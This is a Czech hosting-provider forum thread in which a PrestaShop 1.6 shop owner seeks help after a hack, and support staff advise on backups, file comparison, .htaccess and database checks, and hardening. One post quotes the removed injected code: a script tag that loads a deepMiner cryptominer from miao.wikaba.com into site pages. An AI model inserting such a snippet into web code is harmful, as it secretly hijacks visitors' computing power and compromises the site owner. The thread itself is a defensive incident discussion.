Právě je 21 říj 2018 20:36

Všechny časy jsou v UTC + 1 hodina [ Letní čas ]




Odeslat nové téma Odpovědět na téma  [ Příspěvků: 16 ]  Přejít na stránku 1, 2  Další
Autor Zpráva
 Předmět příspěvku: PrestaShop 1.6 - Hacknuty web
PříspěvekNapsal: 21 úno 2018 18:30 
C4 zákazník

Registrován:
12 zář 2014 08:27
Příspěvky:
50
muj web byl napaden.
mining script jsem ze souboru odstranil ale web stale neaktivni BO i FO. Vsiml jsem si ze pri loadingu po zprave handshake se zobrazi web ( stejny jako byl ve scriptu ) https://miao.wikaba.com ..na ktery se snazi pripojit.
Kde je ta radka ktera redirektuje jak v Front officu a i v Back Officu ? Nekde je to ulozeno a ja to nikde nemohu najit. v index.php to neni.

Prosim help! :-(


Nahoru
 Profil  
 
 Předmět příspěvku: Re: PrestaShop 1.6 - Hacknuty web
PříspěvekNapsal: 21 úno 2018 21:11 
C4 zákazník

Registrován:
12 zář 2014 08:27
Příspěvky:
50
update:
podarilo se mi rozchodit B Office promazanim vsech nahranych scriptu do php souboru. Stale nejde front office ale funguje "Rekonstrukce" / maintanance mode. Zjistil jsem datum a priblizny cas napadeni a podle toho se mi podarilo najit infikovane soubory, tim rozchodit ten back office. Bohuzel u template ( deafult bootstrap ) jsem vse prosel a nic nenasel. Neni nekde nejaky skryty faile nebo tak neco , co porad zkousi se pripojit na zmineny wikaba web? nebo zeby nekde v DB byla schovana radka?


Nahoru
 Profil  
 
 Předmět příspěvku: Re: PrestaShop - 1.6 - Hacknuty web
PříspěvekNapsal: 22 úno 2018 12:06 
C4 zákazník

Registrován:
13 zář 2013 15:02
Příspěvky:
187
Dobrý den,
zkuste web projít pomocí https://www.virustotal.com/#/home/upload a https://www.quttera.com/ . Pokud nepomůže, stáhněte obsah FTP k sobě na disk a projděte antivirem, měl by najít škodlivé patterny, resp. soubory, které je obsahují.


Nahoru
 Profil  
 
 Předmět příspěvku: Re: PrestaShop 1.6 - Hacknuty web
PříspěvekNapsal: 22 úno 2018 14:34 
C4 podpora
C4 podpora

Registrován:
30 čer 2009 09:14
Příspěvky:
6813
Dobrý den,

k dispozici případně máte 30denní zálohy webu i databáze, takže můžete porovnat obsah nebo data obnovit z nezavirované zálohy.

_________________
Radek Plašil
Webhosting C4
https://www.c4.cz/


Nahoru
 Profil  
 
 Předmět příspěvku: Re: PrestaShop 1.6 - Hacknuty web
PříspěvekNapsal: 23 úno 2018 03:43 
C4 zákazník

Registrován:
12 zář 2014 08:27
Příspěvky:
50
Dekuji,

Soubory ve kterych byl vepsany mining script jsou v zaloze netknute. Ale vypada to ze jsem nebyl schopen detekovat vse , nebot BO ktery jeste vcera fungoval , ted uz opet nejde a pres FTP nejsem schopen dohledat nove zasahy. Nejsou nikde viditelne prepisy. Nekde se to stale rozmnozuje a ja to nevidim.
virustotal pise ze jsem clean :-) a quttera indentifikuje 1 soubor., nabizeji odstraneni za poplatek ale ne garanci ze web bude fungovat:-(

Zkusim obnovu ze zalohy.
Zajimalo by me jsetli existuje u nas nejaky servis ktery pomaha temto problemum predejit?
Dekuji


Nahoru
 Profil  
 
 Předmět příspěvku: Re: PrestaShop 1.6 - Hacknuty web
PříspěvekNapsal: 26 úno 2018 12:06 
C4 podpora
C4 podpora

Registrován:
30 čer 2009 09:14
Příspěvky:
6813
Dobrý den,

obecně platí, že tyto aplikace a jejich rozšíření je potřeba udržovat aktuální. Nové verze řeší nejenom funkční chyby starších verzí, ale také bezpečnostní. Rozšíření, která nepoužíváte, je nejlepší zcela odstranit. Bezpečnostní díra může být klidně i v nějaké nestandardní šabloně, takže používat pouze šablony z ověřených zdrojů a také je udržovat aktuální. Formuláře (např. kontaktní formulář, komentáře apod.) je nejlepší opatřit nějakou ochranou proti zneužití (např. captcha, bezpečnostní otázka apod.). A pak samozřejmě všude používat složitá hesla, tzn. pro FTP, databázi a účty. Pokud budete tato základní pravidla dodržovat, tak se nemůže stát, že Váš web někdo zneužije.

_________________
Radek Plašil
Webhosting C4
https://www.c4.cz/


Nahoru
 Profil  
 
 Předmět příspěvku: Re: PrestaShop 1.6 - Hacknuty web
PříspěvekNapsal: 26 úno 2018 13:02 
C4 zákazník

Registrován:
12 zář 2014 08:27
Příspěvky:
50
Dekuji za odpoved.

Ano, zapomnel jsem na Contac us , kde je mozno pripojit soubor ke zprave a tudiz i vir. Prihlaseni na ucet pouzivam potvrzeni emailem, ale uz jsem i stahl captcha modul. Ponaucen z predchozich nezdaru.
Ted jen cekam az me obnovite ze zalohy a budu se modlit aby vir uz nebyl zaklinen v zaloze. Nemam jak to proverit. Klasicky antivir stejne scanuje aplikace , ne weby :-(
Vsiml jsem si ze sript ktery jsem vymazal se druhy den objevil znovu...takze nekde je funkcni / generujici script , ktery to generuje.
V zaloze jsem vygenerovane scripty nenasel a jak vypada ten generujici nevim a ani nevim kde hledat :-(
Hesla jsem pozmenil na komplikovane a cekam na backup.

Dekuji.


Nahoru
 Profil  
 
 Předmět příspěvku: Re: PrestaShop 1.6 - Hacknuty web
PříspěvekNapsal: 26 úno 2018 13:34 
C4 podpora
C4 podpora

Registrován:
30 čer 2009 09:14
Příspěvky:
6813
Dobrý den,

případně můžete soubory porovnat ještě se soubory v originálním instalačním balíčku stejné verze aplikace (https://www.prestashop.com/en/previous-versions). Nežádoucí přesměrování by také mohlo být přímo v souboru .htaccess v kořenové složce instalace. Nebo by mohl útočník změnit adresu obchodu v databázi, takže ještě zkontrolujte nastavení adresy v administraci aplikace nebo přímo v databázi (viz PrestaShop - Konfigurační soubor > "Úprava adresy webu" nebo "Úprava adresy webu v databázi").

_________________
Radek Plašil
Webhosting C4
https://www.c4.cz/


Nahoru
 Profil  
 
 Předmět příspěvku: Re: PrestaShop 1.6 - Hacknuty web
PříspěvekNapsal: 26 úno 2018 14:54 
C4 zákazník

Registrován:
12 zář 2014 08:27
Příspěvky:
50
Diky za naopvedu,

settings.inc.php byl netknuty a v adminu sem byl jen chvily nez to zas cely spadlo. Vdobe kdy to jeste nejak fungovalo aspon vtom adminu, tak nesly zobarzovat poradne obednavky napriklad. Proste rozhozeny css styles , bila plocha a ve sloupcy syrovy udaje zakaznika ale bez produktu co objednal ...atd.
Po prvnim hacknuti jsem se do BOfficu dostal jen tak , ze jsem vymazal :

echo "<script src='https://miao.wikaba.com/jqueryeasyui.js'></script>
<script>
var uri = 'www';
var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
jqueryui.start();
}
</script>";

z nekolika souboru v Core adresari. To mi dalo nekolik hodin na to abych se podival do BO. Moc jsem to neresil nebot uz vte chvily jsem vedel ze to je na obnovu ze zalohy, ze to proste dohromady zpet nedam.

Podle me se utocnik dostal prednimi vratky a ne pres BO nebo FTP. Jestli to dobre chapu tak ukolem bylo odeslat urcita data na wikaba web ale soucastne se tvarit jako ze nic. Jenze tim ze google to vcas spacifikoval a data se nemela kam presunout , tak se to vratilo jako chyba a tudiz to spadlo. Otazkou je jak dlouho sem tam mel ten script ( jak dlouho web wikaba byl funkcni ) .
V Core adresari jsem akorat poznal soubory byli editovany 21.02 o proti ostanim puvodni instalace pred rokem nebo modifikace pred mnoha mesici.

htaccess ...sem porovnaval se zalohou, ale i tak jsem nevidel zadny odkaz na jiny web.

Co se porovnani webu s original balickem, to asi nebude tak snadne. Nejsem schopen stahnout web z FTP kompletne, porad pada pripojeni , pak se to zacykli a pise ze je mnoho pripojeni na raz a proste se to nikam nehejbe. Freezilla ( posledni verze ) na MACu ( Sierra posl.update ). 100M pripojeni.
Proto jsem poazdal zakaznickou podporu o obnoveni ze zalohy, nebot to proste nestahnu , nevim proc:-(
Databazy jsem jeste schopen stahnout, ale GB web bohuzel ne :-(

Ocenil bych , kdyby slo premistovat zalohy na web prostor bez toho aniz bych to musel fyzicky stahovat na svuj disk. To by mi vytrhlo velky trn z paty:-)
Dekuji


Nahoru
 Profil  
 
 Předmět příspěvku: Re: PrestaShop 1.6 - Hacknuty web
PříspěvekNapsal: 26 úno 2018 16:53 
C4 podpora
C4 podpora

Registrován:
30 čer 2009 09:14
Příspěvky:
6813
Dobrý den,

bohužel s FTP klienty pro MAC nemám žádné zkušenosti. Ale pokud to klient umožňuje, tak v nastavení změňte režim přenosu na aktivní nebo naopak na pasivní. Případně zkuste použít úplně jiného FTP klienta.

_________________
Radek Plašil
Webhosting C4
https://www.c4.cz/


Nahoru
 Profil  
 
Zobrazit příspěvky za předchozí:  Seřadit podle  
Odeslat nové téma Odpovědět na téma  [ Příspěvků: 16 ]  Přejít na stránku 1, 2  Další

Všechny časy jsou v UTC + 1 hodina [ Letní čas ]


Kdo je online

Uživatelé procházející toto fórum: Žádní registrovaní uživatelé a 1 návštěvník


Nemůžete zakládat nová témata v tomto fóru
Nemůžete odpovídat v tomto fóru
Nemůžete upravovat své příspěvky v tomto fóru
Nemůžete mazat své příspěvky v tomto fóru
Nemůžete přikládat soubory v tomto fóru

Hledat:
Přejít na:  
FTP Uploader
Staňte se naším zákazníkem!
Hledáme kolegy
PrestaShop partneři

Seznam všech partnerů

PrestaShop Hosting
Návody pro C4

© 2009-2018 ČESKÝ WEBHOSTING s.r.o. Kontaktní e-mail: forum@c4.cz
Diskuzní fórum využívá technologie: phpBB, phpBB-SEO.com, phpBB.cz